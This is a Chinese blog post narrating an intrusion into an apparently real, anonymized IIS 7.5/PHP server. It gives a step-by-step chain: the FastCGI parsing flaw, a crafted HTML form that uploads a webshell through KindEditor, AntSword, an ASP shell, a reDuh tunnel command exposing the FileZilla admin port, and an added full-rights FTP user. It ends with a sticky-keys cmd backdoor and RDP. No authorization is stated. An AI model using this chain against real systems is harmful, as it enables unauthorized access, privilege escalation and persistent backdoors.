目标

信息如下

环境:windows iis7.5 PHP/5.3.28

看到iis7.5+php第一时间就想到了Fast-CGI解析漏洞

解析漏洞

页面是一个登入页面,一个二级域名
68382-v42806zg6n.png

这里随便找一个图片链接地址然后在链接后面加上/.php成功解析

http://xxxx.xxxxx.com/images/l.jpg/.php

85811-sdebskwj38q.png

现在已经确认有解析漏洞,只需要找到上传的地方就可以了

kindeditor

翻js文件的时候在里面发现了kindeditor,也得到了路径
53614-9eitnx6o3ya.png

现在来构造一个上传的html

<html>
 <head></head>
 <body>
  <form name="form" enctype="multipart/form-data" method="post" action="http://xxxxx.com/include/plugin/kindeditor/php/upload_json.php?dir=file">
   <input type="file" name="imgFile" />
   <input type="submit" value="Submit" />
  </form>
 </body>
</html>

准备好一句话木马将后缀名改为.docx,然后选择上传,成功上传得到地址!
81828-btway758609.png

执行命令

现在拿出我们的蚁剑,添加连接,只有www目录的访问权无法跨目录

56436-kf2ac3fdcgi.png

接下来试试看执行命令,无法执行命令,得到系统2008

46621-aciolo6pbsb.png

看了一下phpinfo被disable_functions了

11325-8kg8er0kiq6.png

然后我去看了一下他主站是一个asp的站,跟这个域名同一台,然后上传了一个asp一句话,成功执行了命令

! 一个iis权限,现在也可以看整个D盘不再是www目录

也支持aspx试了一下跟asp一样权限也只能看d盘

FileZilla_server

翻了翻文件夹找到了个FileZilla_server

19390-mi89ateypzf.png

看了下端口14147也开放,看了FileZilla Server Interface.xml文件我们可以看到它的连接地址:127.0.0.1 及端口:14147,密码这里为空。

16887-yyt7fpqd0ng.png

reDuh转发14147

reDuh工具可以把内网服务器的端口通过httptps隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

本机——-客户端———(http隧道)———–服务端——————内网服务器

服务端是个webshell(针对不同服务器有aspx,php,jsp三个版本),客户端是java写的,本机执行最好装上JDK。

把服务端的webshell上传到目标服务器,然后访问,我这里是用的aspx的

02454-lulqp2h952d.png

命令行下用客户端连接服务端

java -jar reDuhClient.jar http://xxx.com/r.aspx

42560-32kdjz8ji0e.png

使用nc本地连接1010端口
11339-0fsjnxr1iqnr.png

连接成功会有欢迎提示,之后输入命令

[createTunnel]1234:127.0.0.1:14147

前面的1234是本机连接用的端口,中间的ip地址是目标服务器的(可以是webshell所在服务器也可以是和它同内网的服务器),后面的14147是欲连接目标服务器的端口。
15493-kknyf5o6k.png

成功将14147转发出来了!

连接FileZilla

打开FileZilla,连接本地的1234,密码为空

46087-0rcngvk403en.png

成功登入

08714-dunqv0liim.png

添加个用户
83106-9ajhuxeykt.png

权限都点满

66176-me1j3plwivo.png

然后使用winscp连接,可以读取C盘文件了

01359-0mprc1y5zfvd.png

这里替换了粘贴键为cmd然后开启3389去,然后使用即可

最后修改:2022 年 01 月 20 日
  • 本文作者:Juneha
  • 本文链接:https://blog.mo60.cn/index.php/archives/37.html
  • 版权声明:本博客所有文章除特别声明外,均默认采用 CC BY-NC-SA 4.0 许可协议。
  • 文章声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任,本人坚决反对利用文章内容进行恶意攻击行为,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
如果觉得我的文章对你有用,请随意赞赏